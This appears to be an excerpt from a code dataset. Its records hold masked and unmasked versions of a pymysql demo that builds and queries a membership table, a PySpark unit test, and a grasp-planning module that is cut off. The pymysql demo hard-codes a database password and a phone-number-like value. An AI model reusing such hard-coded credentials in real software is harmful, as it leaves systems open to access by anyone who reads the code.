VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL 
DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t\"\"\"\n cur1.execute(sql)\n print('createTabl', cur1)\n\n\ndef selectTable(db):\n cur1 = db.cursor()\n cur1.execute(\n 'select member_name,MEMBER_CODE,member_id from python_demo limit 10')\n data = cur1.fetchall()\n for index, item in enumerate(data):\n print(index, sep=' ', end=' ')\n for index2, item2 in enumerate(item):\n print(item2, sep=' ', end=' ')\n print('')\n\n\ndef insertTable(db):\n cur1 = db.cursor()\n cur1.execute(\n \"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, 
INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\"\n )\n\n\ndb = pymysql.connect(host='127.0.0.1', user='pu3147', password='1qaz@WSX',\n database='demo', port=3306, charset='UTF8')\ndropTable(db)\ncreateTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ntesteSelect(db)\nselectTable(db)\ndb.close()\n",
"step-5": "import pymysql\n\n\n\ndef testeSelect(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\t# 使用 execute() 方法执行 SQL 查询 \n\tcur1.execute(\"SELECT VERSION()\")\n\t \n\t# 使用 fetchone() 方法获取单条数据.\n\tdata = cur1.fetchone()\n\tprint(dir(data))\n\tprint (\"cur1 : %s \" % cur1) \n\tprint (\"Database version : %s \" % data)\n\ndef dropTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tcur1.execute(\"drop table if exists python_demo\")\n\tprint('dropTable',cur1)\n\t \n\ndef createTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tsql = '''\n\t\t\tCREATE TABLE IF NOT EXISTS python_demo (\n\t\t\t\tMEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT '会员ID',\n\t\t\t\tMEMBER_CODE VARCHAR(20) NOT NULL COMMENT '会员代码',\n\t\t\t\tMEMBER_NAME VARCHAR(128) NOT NULL COMMENT '公司中文名称',\n\t\t\t\tMEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT '公司简称',\n\t\t\t\tCOMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT '公司英文名称',\n\t\t\t\tREG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tREG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT '公司注册地址',\n\t\t\t\tENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '公司性质',\n\t\t\t\tREGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT '注册资本',\n\t\t\t\tREG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT '注册资本币种',\n\t\t\t\tJUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT '法人名称',\n\t\t\t\tBUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT '公司经营范围',\n\t\t\t\tCOM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT '公司电话',\n\t\t\t\tCOM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT '公司传真',\n\t\t\t\tPERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT '公司负责人',\n\t\t\t\tZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '邮编',\n\t\t\t\tCON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人姓名',\n\t\t\t\tCON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人手机',\n\t\t\t\tCON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人邮箱',\n\t\t\t\tCON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '联系人传真',\n\t\t\t\tCON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件类型',\n\t\t\t\tCON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '联系人证件号',\n\t\t\t\tCON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '联系人证件失效时间',\n\t\t\t\tCON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证正面ID',\n\t\t\t\tCON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '联系人身份证反面ID',\n\t\t\t\tTHERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT '三证合一标志',\n\t\t\t\tBIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '营业执照ID',\n\t\t\t\tBIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '营业执照代码',\n\t\t\t\tBIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '营业执照失效时间',\n\t\t\t\tTAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '税务等级证书ID',\n\t\t\t\tTAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '税务登记号',\n\t\t\t\tTAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '税务登记失效时间',\n\t\t\t\tORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '组织机构代码证ID',\n\t\t\t\tORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '组织机构代码',\n\t\t\t\tORGREG_DATE DATE NULL DEFAULT NULL COMMENT '组织机构失效时间',\n\t\t\t\tBANK_ID INT(20) NULL DEFAULT NULL COMMENT '银行开户许可证ID',\n\t\t\t\tBANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '开户银行类别',\n\t\t\t\tBANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT '开户银行',\n\t\t\t\tBANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT '开户银行编码',\n\t\t\t\tBANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '银行账号',\n\t\t\t\tBANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '银行户主',\n\t\t\t\tINVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT '开票台头',\n\t\t\t\tINVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT '开票地址',\n\t\t\t\tINVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT 
NULL COMMENT '开票详细地址',\n\t\t\t\tAPPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '申请审核机构',\n\t\t\t\tBUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '买家标识',\n\t\t\t\tSELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家标识',\n\t\t\t\tTHIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '第三方标识',\n\t\t\t\tMAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT '主账号ID',\n\t\t\t\tMDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM主数据CODE',\n\t\t\t\tERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERP会员CODE',\n\t\t\t\tREG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '注册类型',\n\t\t\t\tSTATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '会员状态',\n\t\t\t\tAUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT '审核人',\n\t\t\t\tAUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT '审核时间',\n\t\t\t\tAUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT '审核结果',\n\t\t\t\tAUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT '审核意见',\n\t\t\t\tMDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDM审核人',\n\t\t\t\tMDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDM审核时间',\n\t\t\t\tMDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDM审核意见',\n\t\t\t\tMDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDM审核结果',\n\t\t\t\tMEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT '变更ID',\n\t\t\t\tCHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT '变更状态',\n\t\t\t\tALIVE_FLAG VARCHAR(1) NOT NULL COMMENT '当前有效状态',\n\t\t\t\tLANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '语言类型',\n\t\t\t\tCREATE_USER INT(20) NOT NULL COMMENT '创建者',\n\t\t\t\tCREATE_DATE DATETIME NOT NULL COMMENT '创建时间',\n\t\t\t\tUPDATE_USER INT(20) NULL DEFAULT NULL COMMENT '修改者',\n\t\t\t\tUPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT '修改时间',\n\t\t\t\tDELETE_USER INT(20) NULL DEFAULT NULL COMMENT '删除者',\n\t\t\t\tDELETE_DATE DATETIME NULL DEFAULT NULL COMMENT '删除时间',\n\t\t\t\tBUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '买家类型(01:个人买家;02:公司买家)',\n\t\t\t\tAUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '审核身份标识(01:平台;02:卖家)',\n\t\t\t\tAUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '审核卖家ID(当审核身份标识为卖家审核时,审核的卖家ID)',\n\t\t\t\tSELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统',\n\t\t\t\tSELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家SAP系统',\n\t\t\t\tSELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT '卖家MDM系统数据CODE',\n\t\t\t\tIS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '黑名单状态(41:是;0:否)',\n\t\t\t\tINVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-省',\n\t\t\t\tINVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '用户所属区域-市',\n\t\t\t\tPRIMARY KEY (MEMBER_ID)\n\t\t\t)\n\t\t\tCOMMENT='会员信息表'\n\t\t\tCOLLATE='utf8_general_ci'\n\t\t\tENGINE=InnoDB\n\t'''\n\n\tcur1.execute(sql)\n\t\n\tprint('createTabl',cur1)\n\ndef selectTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tcur1.execute(\"select member_name,MEMBER_CODE,member_id from python_demo limit 10\")\n\n\t# 使用 fetchall() 接收全部的返回结果行\n\tdata = cur1.fetchall()\n\tfor index,item in enumerate(data):\n\t\tprint(index,sep=' ', end=' ')\n\t\tfor index2,item2 in enumerate(item):\n\t\t\tprint(item2,sep=' ', end=' ')\n\t\tprint(\"\")\n\ndef insertTable(db):\n\t#创建查询游标\n\tcur1 = db.cursor()\n\n\tcur1.execute(\"INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, 
BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', '中国有限公司', '中国有限公司', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)\")\n\n\t# 使用 fetchall() 接收全部的返回结果行\n\t#data = cur1.rowcount()\n\n\t#print('insertTable',data)\n\n# 打开数据库连接\ndb = pymysql.connect(host='127.0.0.1',user='pu3147',\n\tpassword='1qaz@WSX',database='demo',port=3306,charset='UTF8')\n\n\ndropTable(db)\ncreateTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ninsertTable(db)\ntesteSelect(db)\nselectTable(db)\n\n# 关闭数据库连接\ndb.close()\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
#!/usr/bin/env python
import unittest
from pyspark import SparkConf, SparkContext
from mmtfPyspark.io.mmtfReader import download_mmtf_files
from mmtfPyspark.datasets import secondaryStructureExtractor
from mmtfPyspark.filters import ContainsLProteinChain
from mmtfPyspark.mappers import StructureToPolymerChains
class SecondaryStructureExtractorTest(unittest.TestCase):
def setUp(self):
conf = SparkConf().setMaster("local[*]").setAppName('secondaryStructureExtractorTest')
self.sc = SparkContext(conf=conf)
pdbIds = ["1STP","4HHB"]
self.pdb = download_mmtf_files(pdbIds,self.sc)
def test1(self):
pdb = self.pdb.filter(ContainsLProteinChain()) \
.flatMap(StructureToPolymerChains()) \
.filter(ContainsLProteinChain())
seq = secondaryStructureExtractor.get_dataset(pdb)
self.assertTrue(seq.count() == 5)
def tearDown(self):
self.sc.stop()
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "480e6ae9eee70b2da58ca5624a43d8f5dcae1d33",
"index": 1207,
"step-1": "<mask token>\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n <mask token>\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster('local[*]').setAppName(\n 'secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n pdbIds = ['1STP', '4HHB']\n self.pdb = download_mmtf_files(pdbIds, self.sc)\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster('local[*]').setAppName(\n 'secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n pdbIds = ['1STP', '4HHB']\n self.pdb = download_mmtf_files(pdbIds, self.sc)\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom pyspark import SparkConf, SparkContext\nfrom mmtfPyspark.io.mmtfReader import download_mmtf_files\nfrom mmtfPyspark.datasets import secondaryStructureExtractor\nfrom mmtfPyspark.filters import ContainsLProteinChain\nfrom mmtfPyspark.mappers import StructureToPolymerChains\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster('local[*]').setAppName(\n 'secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n pdbIds = ['1STP', '4HHB']\n self.pdb = download_mmtf_files(pdbIds, self.sc)\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()).flatMap(\n StructureToPolymerChains()).filter(ContainsLProteinChain())\n seq = secondaryStructureExtractor.get_dataset(pdb)\n self.assertTrue(seq.count() == 5)\n\n def tearDown(self):\n self.sc.stop()\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#!/usr/bin/env python\n\nimport unittest\nfrom pyspark import SparkConf, SparkContext\nfrom mmtfPyspark.io.mmtfReader import download_mmtf_files\nfrom mmtfPyspark.datasets import secondaryStructureExtractor\nfrom mmtfPyspark.filters import ContainsLProteinChain\nfrom mmtfPyspark.mappers import StructureToPolymerChains\n\n\nclass SecondaryStructureExtractorTest(unittest.TestCase):\n\n def setUp(self):\n conf = SparkConf().setMaster(\"local[*]\").setAppName('secondaryStructureExtractorTest')\n self.sc = SparkContext(conf=conf)\n\n pdbIds = [\"1STP\",\"4HHB\"]\n self.pdb = download_mmtf_files(pdbIds,self.sc)\n\n\n def test1(self):\n pdb = self.pdb.filter(ContainsLProteinChain()) \\\n .flatMap(StructureToPolymerChains()) \\\n .filter(ContainsLProteinChain())\n\n seq = secondaryStructureExtractor.get_dataset(pdb)\n\n self.assertTrue(seq.count() == 5)\n\n\n def tearDown(self):\n self.sc.stop()\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import math
import numpy as np
import basis.robot_math as rm
import grasping.annotation.utils as gu
from scipy.spatial import cKDTree
def plan_contact_pairs(objcm,
max_samples=100,
min_dist_between_sampled_contact_points=.005,
angle_between_contact_normals=math.radians(160),
toggle_sampled_points=False):
"""
find the contact pairs using rayshooting
    the number of contact pairs finally returned may be smaller than the given max_samples due to the min_dist constraint
    :param angle_between_contact_normals:
    :param toggle_sampled_points:
:return: [[contact_p0, contact_p1], ...]
author: weiwei
date: 20190805, 20210504
"""
contact_points, face_ids = objcm.sample_surface(nsample=max_samples,
radius=min_dist_between_sampled_contact_points / 2)
contact_normals = objcm.objtrm.face_normals[face_ids]
contact_pairs = []
tree = cKDTree(contact_points)
near_history = np.array([0] * len(contact_points), dtype=bool)
for i, contact_p0 in enumerate(contact_points):
        if near_history[i]:  # skip points already marked as near a previously found contact pair
continue
contact_n0 = contact_normals[i]
hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * .001, contact_p0 - contact_n0 * 100)
if len(hit_points) > 0:
for contact_p1, contact_n1 in zip(hit_points, hit_normals):
if np.dot(contact_n0, contact_n1) < -math.cos(angle_between_contact_normals):
near_points_indices = tree.query_ball_point(contact_p1, min_dist_between_sampled_contact_points)
if len(near_points_indices):
for npi in near_points_indices:
if np.dot(contact_normals[npi], contact_n1) > math.cos(angle_between_contact_normals):
near_history[npi] = True
contact_pairs.append([[contact_p0, contact_n0], [contact_p1, contact_n1]])
if toggle_sampled_points:
return contact_pairs, contact_points
return contact_pairs
def plan_grasps(hnd_s,
objcm,
angle_between_contact_normals=math.radians(160),
                openning_direction='loc_x',
